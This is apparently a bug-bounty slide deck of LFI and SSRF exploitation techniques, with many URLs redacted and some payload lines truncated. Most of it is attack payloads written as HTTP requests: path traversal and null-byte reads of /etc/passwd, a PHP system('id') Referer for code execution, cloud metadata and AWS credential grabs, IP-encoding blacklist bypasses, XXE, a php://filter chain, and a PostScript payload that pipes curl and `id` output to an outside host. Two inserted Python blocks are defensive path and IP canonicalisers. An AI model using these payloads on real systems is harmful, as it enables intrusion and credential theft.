LFI and SSRF Exploitation Techniques

The document outlines various methodologies for exploiting Local File Inclusion (LFI) and Server-Side Request Forgery (SSRF) vulnerabilities. It provides specific injection techniques and payload examples to access sensitive files and internal services. The techniques include manipulating URLs, using different encoding methods, and bypassing blacklists to extract data from servers.

Interaction File - URL
[Link]

Mahmoud M. Awali
@0xAwali
My Methodology

Try To Inject ../../../../../etc/passwd OR %252fetc%252fpasswd To Get Content Of etc/passwd If There Is LFI

● Blog
● Blog
● Blog
● Writeup

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=../../../../../etc/passwd
My Methodology

Use Chinese Separator %E3%80%82 Instead Of DOT e.g. %E3%80%82%E3%80%82/etc/passwd To Get Content Of etc/passwd

● Tweet
My Methodology

Try To Inject ../../../../../etc/passwd%00 To Get Content Of etc/passwd If There Is LFI

● Writeup

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=../../../../../etc/passwd%00
My Methodology

Try To Inject ../../../../../proc/self/fd/Number-FUZZ With Referer Header <?php system('id');?> To Get RCE

● Writeup

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: <?php system('id');?>
Origin: [Link]
Content-Length: Number

File-URL=../../../../../proc/self/fd/Number-FUZZ
My Methodology

Try To Inject jsp/etc/../../WEB-INF/[Link] To Get DB Configuration Files If There Is LFI

● Writeup

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=jsp/etc/../../WEB-INF/[Link]
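The traversal, double-encoding, null-byte and alternate-separator payloads on the slides above all get past filters that look for the literal string `../`. This added example (not from the slides) shows the server-side check a defender uses instead: decode until the value is stable, reject control and non-ASCII characters, then canonicalise and require the result to stay under the served directory. The base directory and the sample paths are constructed for the example.

```python
import os
from typing import Optional
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3  # assumption: legitimate input is encoded at most once or twice


def fully_decode(value: str) -> str:
    """Percent-decode until the string stops changing (bounded), so that
    double-encoded input such as %252fetc%252fpasswd is judged as '/etc/passwd'."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")


def safe_resolve(base_dir: str, user_path: str) -> Optional[str]:
    """Return the canonical absolute path if it stays inside base_dir, else None.
    The decision is made on the decoded, normalised path rather than on the raw
    string, so '../', '%2e%2e/' and '%252f' are all caught by the same rule."""
    try:
        path = fully_decode(user_path)
    except ValueError:
        return None
    if "\x00" in path:
        # Null byte: a C-level open() would truncate the name at this point
        return None
    if not path.isascii():
        # Look-alike separators such as U+3002 (sent as %E3%80%82) are accepted
        # as a dot by some path handlers; a file parameter has no need for them
        return None
    base = os.path.realpath(base_dir)
    # os.path.join discards base when path is absolute; realpath collapses '..'
    candidate = os.path.realpath(os.path.join(base, path))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample inputs following the payload shapes discussed above
    for p in ["../../../../../etc/passwd", "%252fetc%252fpasswd",
              "../../../../../etc/passwd%00", "%E3%80%82%E3%80%82/etc/passwd",
              "reports/2024/summary.txt"]:
        print(f"{p!r:40} -> {safe_resolve('/srv/app/files', p)}")
```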
My Methodology

Try To Inject [Link] To Get Full Request If There Is SSRF

● Blog
● Writeup
● Writeup
● Writeup

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Append # OR %0d%0aX:%20 To Your Domain e.g. [Link] To Bypass Appending Anything After URL

● Tweet
● Tweet

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Inject [Link] To Get Content Of etc/passwd If There Is SSRF

● Writeup
● Writeup
● Writeup

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Inject [Link] To Get Content Of etc/passwd If There Is SSRF

● Tweet
● Blog

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Inject [Link] To Get Content Of etc/passwd If There Is SSRF

● Tweet

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Inject view-source:[Link] To Get Content Of etc/passwd If There Is SSRF

● Tweet

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=view-source:[Link]
My Methodology

Try To Inject [Link] To Get Internal Services

● Video
● Tweet
● Writeup
● Writeup
● Writeup

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Inject [Link] To Extract User Data

● Video
● Blog

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Inject [Link] To Extract Temporary AWS Credentials

● Video
● Tweet
● Tweet
● Writeup
● Writeup

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]entials/
My Methodology

Try To Inject [Link] OR [Link] To Extract Credentials

● Resource

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Inject [Link] To Extract Kubernetes API

● Tweet

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Inject [Link]recursive=true To Grab All Internal Metadata

● Tweet

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]ta1/?recursive=true
My Methodology

Try To Use [Link].[Link] Instead Of [Link] To Bypass Blacklist

● Video
● Tweet

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Use base36(int('[Link]')) e.g. [Link] Instead Of [Link] To Bypass Blacklist

● Video

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Use [Link] Instead Of [Link] To Bypass Blacklist

● Video

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Change The HTTP Version From 1.1 To HTTP/0.9 And Remove The Host Header To Bypass Blacklist

● Tweet
● Tweet

POST /Interaction-File-URL HTTP/0.9
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]entials/
My Methodology

Try To Drop The Zeros e.g. [Link] → [Link] To Bypass Blacklist

● Tweet
My Methodology

Try To Add Extra Zeros e.g. [Link] To Bypass Blacklist

● Tweet
My Methodology

Try To Use Dotted Decimal With Overflow e.g. [Link] To Bypass Blacklist

● Video

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Use Dotless Decimal e.g. [Link] To Bypass Blacklist

● Video

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Use Dotless Decimal With Overflow e.g. [Link] To Bypass Blacklist

● Video

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Use Dotted Hexadecimal e.g. [Link] To Bypass Blacklist

● Video
● Writeup

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Use Dotless Hexadecimal e.g. [Link] To Bypass Blacklist

● Video

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Use Dotless Hexadecimal With Overflow e.g. [Link] To Bypass Blacklist

● Video

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Use Dotted Octal e.g. [Link] To Bypass Blacklist

● Video

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Use Dotted Octal With Padding e.g. [Link] To Bypass Blacklist

● Video

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Mix Them e.g. Decimal Overflow + Hex + Octal e.g. [Link] To Bypass Blacklist

● Video

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Convert Only Parts Of The Address e.g. Octal + Hex + 2-Byte Wide Dotless Decimal e.g. [Link] OR [Link] To Bypass Blacklist

● Video
● Tweet

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Use IPv4-Compatible Address e.g. [Link] To Bypass Blacklist

● Video

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Use IPv4-Mapped Address e.g. [Link] To Bypass Blacklist

● Video

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
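Every notation on the preceding slides (dropped or padded zeros, dotted and dotless decimal, octal, hexadecimal, mixed components, IPv4-compatible and IPv4-mapped IPv6) names the same few bytes, so a blacklist that compares strings is defeated by any of them. This added example (not the author's code) canonicalises a host literal the way an inet_aton-style resolver would and only then asks whether it lands in a blocked range; the component grammar follows inet_aton and the sample literals are constructed.

```python
import ipaddress
import re
from typing import Optional

# One inet_aton-style component: 0x.. hexadecimal, leading-0 octal, otherwise decimal.
_PART = re.compile(r"^(0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)$")


def _parse_part(part: str) -> int:
    if not _PART.match(part):
        raise ValueError(part)
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def canonical_ipv4(host: str) -> Optional[str]:
    """Reduce any notation an inet_aton-style resolver accepts to dotted-quad form,
    including 1-3 component 'dotless' forms and IPv4 addresses embedded in IPv6."""
    host = host.strip("[]")
    if ":" in host:
        try:
            v6 = ipaddress.IPv6Address(host)
        except ValueError:
            return None
        if v6.is_loopback or v6.is_unspecified:  # ::1 and :: are not IPv4; caller checks them as v6
            return None
        if v6.ipv4_mapped is not None:           # ::ffff:a.b.c.d
            return str(v6.ipv4_mapped)
        if int(v6) < 1 << 32:                    # ::a.b.c.d (IPv4-compatible, deprecated)
            return str(ipaddress.IPv4Address(int(v6)))
        return None
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    *head, tail = values
    # Leading components are single bytes; the last one fills all remaining bytes,
    # which is why 127.1, 0x7f.1 and 2130706433 all mean 127.0.0.1.
    if any(v > 0xFF for v in head) or tail >= 1 << (8 * (4 - len(head))):
        return None
    number = tail
    for i, v in enumerate(head):
        number |= v << (8 * (3 - i))
    return str(ipaddress.IPv4Address(number))


def is_blocked(host: str) -> bool:
    """True when the literal names a loopback, private, link-local, unspecified or
    reserved address in any notation. Hostnames return False here: resolve them and
    run the resolved address through this same check (DNS rebinding needs more)."""
    literal = canonical_ipv4(host) or host.strip("[]")
    try:
        addr = ipaddress.ip_address(literal)
    except ValueError:
        return False
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_unspecified or addr.is_reserved)
```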
My Methodology

Try To Use [Link] To Bypass Blacklist

● Video

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Use [Link] To Bypass Blacklist

● Video
● Writeup

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Use [Link] e.g. [Link] OR [Link] To Bypass Blacklist

● Video
● Tweet
● Writeup
● Writeup
● Writeup

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

Try To Use HTTP Redirection To Bypass Blacklist e.g. [Link] Will Redirect You To I.P.v.4:PORT

● Video

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
List Of Patterns To Bypass The Whitelist

[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link] :80/
[Link]
[Link]
[Link]
[Link] :80/
[Link] :80/
[Link]
[Link]
[Link] :80/
[Link]
[Link]
[Link] :80/

● Tweet
● Video
● Payloads
My Methodology

Try To Use [Link] @[Link] To Bypass Blacklist

● Slides

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link] @[Link]
My Methodology

Try To Use Protocol Wrappers Other Than HTTP OR HTTPS e.g. SSH, SFTP, POP3, IMAP, SMTP, FTP, DICT, GOPHER OR TFTP e.g. s[Link] To Bypass Blacklist

● Writeup

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=s[Link]
Try To Use This Payload

● Slides

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=php://filter/[Link]-936%2FCP1388|convert.base64-encode|convert.base64-encode|[Link].UTF8%2FIBM4899%2F%2FTRANSLIT|convert.base64-encode|[Link]se64-encode|convert.base64-encode|[Link].UTF8%2FIBM4899%2F%2FTRANSLIT|[Link]-printable-encode|convert.i[Link]-936%2FCP1388/resource=/etc/passwd%20#@%20read/resource=[Link]
Try To Use This Payload

● Slides

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=php://filter/[Link]-936%2FCP1388|convert.base64-encode|convert.base64-encode|[Link].UTF8%2FIBM4899%2F%2FTRANSLIT|convert.base64-encode|[Link]se64-encode|convert.base64-encode|[Link].UTF8%2FIBM4899%2F%2FTRANSLIT|[Link]-printable-encode|convert.i[Link]-936%2FCP1388/resource=/etc/passwd%20#@%20read/resource=[Link]
[Link]?url=[Link]
My Methodology

If You Got Blind SSRF Over HTTP OR HTTPS, Try To Request The Unresolvable Subdomains Because Some Subdomains Are Reachable Only Over VPN

● Tweet
My Methodology

If You Got Blind SSRF Over HTTP OR HTTPS, Try To Request An Internal URL That Performs Another SSRF That Calls Out To Your Domain e.g. Apache Solr Is Running Internally

● Blog

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]ct?q={!xmlparser v='<!DOCTYPE a SYSTEM "[Link]
My Methodology

If There Is [Link] Try To Inject .+./.+./[Link] OR http:// [Link]:[0-65535]/[Home|Admin|Administrator]/Index? To Get Admin Page

● Slides
● Blog

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=http:// [Link]:PORT/Home/Index?
Reading From Remote XML File

root@mine:~# cat [Link]
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY read SYSTEM "[Link]">
]>
<root><email>&read;</email></root>

● Slides
● Tweet
● Writeup

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
Reading From Remote mp4 File

root@mine:~# cat file.mp4
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
[Link]
#EXT-X-ENDLIST

● Writeup

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
Reading From Remote Image

root@mine:~# cat [Link]
%!PS
userdict /setpagedevice undef
save
legal
{null restore} stopped {pop} if
{legal} stopped {pop} if
restore
mark /OutputFile (%pipe%curl${IFS}[Link]/`id`)
currentdevice putdeviceprops

● Blog

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
Interaction With Remote URL

root@mine:~# cat [Link]
<?php
header("Location: [Link]");
?>

● Writeup

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
Interaction With Remote URL II

root@mine:~# cat [Link]
<?php
header("Location: [Link]", TRUE, 303);
?>

● Writeup

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
Interaction With Remote URL III

Steps to reproduce:

1 - Try To Set Your Domain e.g. [Link] As Remote URL And Run Wireshark On It
2 - If There Is Range OR Content-Range Header
3 - Try To Respond With e.g. Bytes 2M AND Upload File Less Than Bytes 2M On [Link]
4 - The Company Will Re-request The Rest Of Bytes 2M
5 - Try To Redirect Second Request To e.g. [Link]

● Writeup
My Methodology

If There Is SSRF Try To Inject [Link] To Get XSS

● Writeup
● Writeup

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

If You Can Embed Videos From Services e.g. Vimeo, YouTube, Twitter AND Facebook, Try To Inject XSS Payloads In Their Title AND Description To Get XSS

● Tweet
My Methodology

Try To Use Open Redirection To Bypass The Blacklist e.g. [Link] [Link]=json To Extract Google Metadata

● Video
● Video
● Blog
● Writeup

POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link][Link]/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json
My Methodology

Try To Use DNS Rebinding Technique By Using Tools e.g. Singularity OR [Link] To Bypass The Blacklist

● Video
● Video
● Video
● Writeup

Steps to reproduce:

2 - Open Your Terminal
3 - Write This Command
./[Link] --ip1=Blacklist --ip2=Allowed --scheme=PORT
Mark Valenzia ● Tweet #BugBounty #BugBountyTip
Hack3rScr0lls ● Tweet #BugBounty #BugBountyTip

Thank You
Mahmoud M. Awali
@0xAwali